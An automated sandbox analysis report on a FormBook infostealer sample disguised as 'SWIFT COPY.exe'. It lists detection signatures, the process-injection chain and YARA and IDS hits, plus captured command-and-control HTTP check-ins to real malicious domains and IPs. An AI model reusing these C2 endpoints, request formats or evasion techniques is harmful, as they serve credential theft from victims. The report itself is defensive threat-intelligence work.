Windows Analysis Report
SWIFT COPY.exe

Overview

General Information

Sample name: SWIFT COPY.exe
Analysis ID: 1578068
MD5: 180a3e0827818592194c3a46dd8e9dd7
SHA1: fa90e6b8c4a962d3cb324cf23afe68845d6e5013
SHA256: b46e3f5fe8669966df0df40ef2ff40a1de2f8141da974f8058eb03c2897feacf
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SWIFT COPY.exe (PID: 7404 cmdline: "C:\Users\user\Desktop\SWIFT COPY.exe" MD5: 180A3E0827818592194C3A46DD8E9DD7)
    • SWIFT COPY.exe (PID: 7764 cmdline: "C:\Users\user\Desktop\SWIFT COPY.exe" MD5: 180A3E0827818592194C3A46DD8E9DD7)
      • XwGiOcrCkQ.exe (PID: 4092 cmdline: "C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • finger.exe (PID: 8008 cmdline: "C:\Windows\SysWOW64\finger.exe" MD5: C586D06BF5D5B3E6E9E3289F6AA8225E)
          • XwGiOcrCkQ.exe (PID: 6016 cmdline: "C:\Program Files (x86)\IRdZQSwOJAbvswfNOELjAqMfhfItSIUoCWqNZKUGIpPfXbRJEMvNbZIMm\XwGiOcrCkQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 8168 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.SWIFT COPY.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.SWIFT COPY.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-19T08:39:48.421435+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49884 | 134.122.191.187 | 80 | TCP
2024-12-19T08:40:53.098661+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49763 | 104.21.86.111 | 80 | TCP
2024-12-19T08:41:26.835082+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49845 | 194.58.112.174 | 80 | TCP
2024-12-19T08:39:48.421435+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49884 | 134.122.191.187 | 80 | TCP
2024-12-19T08:40:53.098661+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 104.21.86.111 | 80 | TCP
2024-12-19T08:41:26.835082+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49845 | 194.58.112.174 | 80 | TCP
2024-12-19T08:41:18.792202+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49825 | 194.58.112.174 | 80 | TCP
2024-12-19T08:41:21.459881+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49831 | 194.58.112.174 | 80 | TCP
2024-12-19T08:41:24.187165+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49836 | 194.58.112.174 | 80 | TCP
2024-12-19T08:41:34.452861+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49863 | 134.122.191.187 | 80 | TCP
2024-12-19T08:41:37.124839+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49869 | 134.122.191.187 | 80 | TCP
2024-12-19T08:41:39.796635+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49875 | 134.122.191.187 | 80 | TCP

                AV Detection

                Source: SWIFT COPY.exe, Virustotal: Detection: 34%
                Source: SWIFT COPY.exe, ReversingLabs: Detection: 63%
                Source: Yara match, File source: 3.2.SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3579400562.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2227839219.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: SWIFT COPY.exe, Joe Sandbox ML: detected
                Source: SWIFT COPY.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: SWIFT COPY.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: finger.pdb source: SWIFT COPY.exe, 00000003.00000002.2224493512.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000002.3578837135.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XwGiOcrCkQ.exe, 00000006.00000002.3579093202.0000000000E6E000.00000002.00000001.01000000.0000000C.sdmp, XwGiOcrCkQ.exe, 00000008.00000000.2293359567.0000000000E6E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: SWIFT COPY.exe, 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2223664061.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2227019502.0000000002E74000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SWIFT COPY.exe, SWIFT COPY.exe, 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000007.00000002.3579576147.00000000031BE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3579576147.0000000003020000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2223664061.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.2227019502.0000000002E74000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: finger.pdbGCTL source: SWIFT COPY.exe, 00000003.00000002.2224493512.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, XwGiOcrCkQ.exe, 00000006.00000002.3578837135.000000000083E000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\finger.exe, Code function: 7_2_0288C7B0 FindFirstFileW, FindNextFileW, FindClose
                Source: C:\Windows\SysWOW64\finger.exe, Code function: 7_2_02879F20, 4x nop then xor eax, eax
                Source: C:\Windows\SysWOW64\finger.exe, Code function: 7_2_0287E3A1, 4x nop then pop edi
                Source: C:\Windows\SysWOW64\finger.exe, Code function: 7_2_02F704BE, 4x nop then mov ebx, 00000004h

                Networking

                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49763 -> 104.21.86.111:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49763 -> 104.21.86.111:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49825 -> 194.58.112.174:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49831 -> 194.58.112.174:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49836 -> 194.58.112.174:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49863 -> 134.122.191.187:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49869 -> 134.122.191.187:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49845 -> 194.58.112.174:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49845 -> 194.58.112.174:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49875 -> 134.122.191.187:80
                Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49884 -> 134.122.191.187:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49884 -> 134.122.191.187:80
                Source: DNS query: www.pbfgm.xyz
                Source: Joe Sandbox View, IP Address: 194.58.112.174
                Source: Joe Sandbox View, ASN Name: BCPL-SGBGPNETGlobalASNSG
                Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                Source: Joe Sandbox View, ASN Name: AS-REGRU
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic, HTTP traffic detected:
                    GET /fjd6/?Ir=beVfoldUF3/aok0FdWpvJC8HGsWBcAhapzZJ64FbAFAGDRV4pYz0MK1VY/vkdFXAOWskmP9Sk8tWhxHaAHTK2FUvh8SZisD6hpiODREZagit+S+U5/mb9Z4=&M8Gl=KPotmx2p0n HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.pbfgm.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global traffic, HTTP traffic detected:
                    GET /1ne4/?Ir=Xmf7DtAQ/BnKPHUir9F/DJAWe/lobbRTq1FD1Ek4pNpfKYXlmyGrxyMDIrQcVSlaQ+EmZyFY/HlqglCDghJI5jUfoqKY7Fz8p0/9FqW//8AiMTO0G3RJpL4=&M8Gl=KPotmx2p0n HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.elinor.club
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global traffic, HTTP traffic detected:
                    GET /s6zh/?Ir=3lPbUJ/4EMFnMU367dk2ybPqIMylLyFhjqRifsXJf3a7S0x2d/GglTvwUDIMpGCMSyBp4aVeuGLlN5/zkDRsMKMrA2+vlNwKuHc+NKCv2NtQORSHn8saFjw=&M8Gl=KPotmx2p0n HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Host: www.smalleyes.icu
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                Source: global traffic, DNS traffic detected: DNS query: www.pbfgm.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.phdcoach.pro
                Source: global traffic, DNS traffic detected: DNS query: www.elinor.club
                Source: global traffic, DNS traffic detected: DNS query: www.smalleyes.icu
                Source: unknown, HTTP traffic detected:
                    POST /1ne4/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US
                    Accept-Encoding: gzip, deflate, br
                    Host: www.elinor.club
                    Origin: http://www.elinor.club
                    Content-Type: application/x-www-form-urlencoded
                    Connection: close
                    Content-Length: 199
                    Cache-Control: no-cache
                    Referer: http://www.elinor.club/1ne4/
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-N910T Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/2.0 Chrome/34.0.1847.76 Mobile Safari/537.36
                    Data Ascii: Ir=ak3bAasuzQTxEloNruBaN4ELZfgzT7d5gF9G1yIQ8eZICKXAvhaN1DMVLe5WKVQVIIocZSNW0VAvr2+n5jlpxBZrnq+w+TLl1ECyJKWZ+50IGCarXE9D767EMU7GRX2tB3HkKQUPeHEdI8CWkVNc7MNwpsZIEEIXONGKWhkubNSiRGxXW/5JsUnoGbwT+JdKBw==
                Source: global traffic, HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Thu, 19 Dec 2024 07:40:52 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lPshYalhrtD9Y10kN9TS1MuLLXFbXNssi%2Bzcc2WGAEMAB8aplepjKd7Y%2BPmmZzy3ufoTrcjYhx1n0tEx9%2FLH3kLBFMi9CrejcvL4S8uOaj65j6HuXRYsd%2F5rzb%2BRU5L7"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8f45bf3ba8c8ef9d-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1793&min_rtt=1793&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 228<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome frien

                E-Banking Fraud

                Source: Yara match, File source: 3.2.SWIFT COPY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 3.2.SWIFT COPY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000007.00000002.3579225872.0000000002C10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3579265567.0000000002C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2224196116.0000000000E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3578299368.0000000002870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3579400562.0000000002390000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000003.00000002.2227839219.0000000001800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_0042C743 NtClose
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372B60 NtClose, LdrInitializeThunk
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372DF0 NtQuerySystemInformation, LdrInitializeThunk
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372C70 NtFreeVirtualMemory, LdrInitializeThunk
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_013735C0 NtCreateMutant, LdrInitializeThunk
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01374340 NtSetContextThread
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01374650 NtSuspendThread
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372BA0 NtEnumerateValueKey
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372B80 NtQueryInformationFile
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372BF0 NtAllocateVirtualMemory
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372BE0 NtQueryValueKey
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372AB0 NtWaitForSingleObject
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372AF0 NtWriteFile
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372AD0 NtReadFile
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372D30 NtUnmapViewOfSection
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372D10 NtMapViewOfSection
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372D00 NtSetInformationFile
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372DB0 NtEnumerateKey
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372DD0 NtDelayExecution
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372C00 NtQueryInformationProcess
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372C60 NtCreateKey
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372CA0 NtQueryInformationToken
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372CF0 NtOpenProcess
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372CC0 NtQueryVirtualMemory
                Source: C:\Users\user\Desktop\SWIFT COPY.exe, Code function: 3_2_01372F30 NtCreateSection
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372F60 NtCreateProcessEx,3_2_01372F60
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372FB0 NtResumeThread,3_2_01372FB0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372FA0 NtQuerySection,3_2_01372FA0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372F90 NtProtectVirtualMemory,3_2_01372F90
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372FE0 NtCreateFile,3_2_01372FE0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372E30 NtWriteVirtualMemory,3_2_01372E30
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372EA0 NtAdjustPrivilegesToken,3_2_01372EA0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372E80 NtReadVirtualMemory,3_2_01372E80
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01372EE0 NtQueueApcThread,3_2_01372EE0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01373010 NtOpenDirectoryObject,3_2_01373010
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01373090 NtSetValueKey,3_2_01373090
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_013739B0 NtGetContextThread,3_2_013739B0
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01373D10 NtOpenProcessToken,3_2_01373D10
                Source: C:\Users\user\Desktop\SWIFT COPY.exeCode function: 3_2_01373D70 NtOpenThread,3_2_01373D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03094340 NtSetContextThread,LdrInitializeThunk,7_2_03094340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03094650 NtSuspendThread,LdrInitializeThunk,7_2_03094650
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092B60 NtClose,LdrInitializeThunk,7_2_03092B60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_03092BA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092BE0 NtQueryValueKey,LdrInitializeThunk,7_2_03092BE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_03092BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092AD0 NtReadFile,LdrInitializeThunk,7_2_03092AD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092AF0 NtWriteFile,LdrInitializeThunk,7_2_03092AF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092F30 NtCreateSection,LdrInitializeThunk,7_2_03092F30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092FB0 NtResumeThread,LdrInitializeThunk,7_2_03092FB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092FE0 NtCreateFile,LdrInitializeThunk,7_2_03092FE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_03092E80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092EE0 NtQueueApcThread,LdrInitializeThunk,7_2_03092EE0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092D10 NtMapViewOfSection,LdrInitializeThunk,7_2_03092D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_03092D30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092DD0 NtDelayExecution,LdrInitializeThunk,7_2_03092DD0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_03092DF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092C60 NtCreateKey,LdrInitializeThunk,7_2_03092C60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_03092C70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_03092CA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030935C0 NtCreateMutant,LdrInitializeThunk,7_2_030935C0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030939B0 NtGetContextThread,LdrInitializeThunk,7_2_030939B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092B80 NtQueryInformationFile,7_2_03092B80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092AB0 NtWaitForSingleObject,7_2_03092AB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092F60 NtCreateProcessEx,7_2_03092F60
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092F90 NtProtectVirtualMemory,7_2_03092F90
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092FA0 NtQuerySection,7_2_03092FA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092E30 NtWriteVirtualMemory,7_2_03092E30
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092EA0 NtAdjustPrivilegesToken,7_2_03092EA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092D00 NtSetInformationFile,7_2_03092D00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092DB0 NtEnumerateKey,7_2_03092DB0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092C00 NtQueryInformationProcess,7_2_03092C00
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092CC0 NtQueryVirtualMemory,7_2_03092CC0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03092CF0 NtOpenProcess,7_2_03092CF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03093010 NtOpenDirectoryObject,7_2_03093010
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03093090 NtSetValueKey,7_2_03093090
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03093D10 NtOpenProcessToken,7_2_03093D10
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03093D70 NtOpenThread,7_2_03093D70
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02899340 NtCreateFile,7_2_02899340
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02899630 NtClose,7_2_02899630
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02899790 NtAllocateVirtualMemory,7_2_02899790
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_028994A0 NtReadFile,7_2_028994A0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_02899590 NtDeleteFile,7_2_02899590
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031175717_2_03117571
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030FD5B07_2_030FD5B0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031295C37_2_031295C3
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311F43F7_2_0311F43F
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030514607_2_03051460
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311FB767_2_0311FB76
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0307FB807_2_0307FB80
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0309DBF97_2_0309DBF9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030D5BF07_2_030D5BF0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03117A467_2_03117A46
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0311FA497_2_0311FA49
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030D3A6C7_2_030D3A6C
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030FDAAC7_2_030FDAAC
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_030A5AA07_2_030A5AA0
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_03101AA37_2_03101AA3
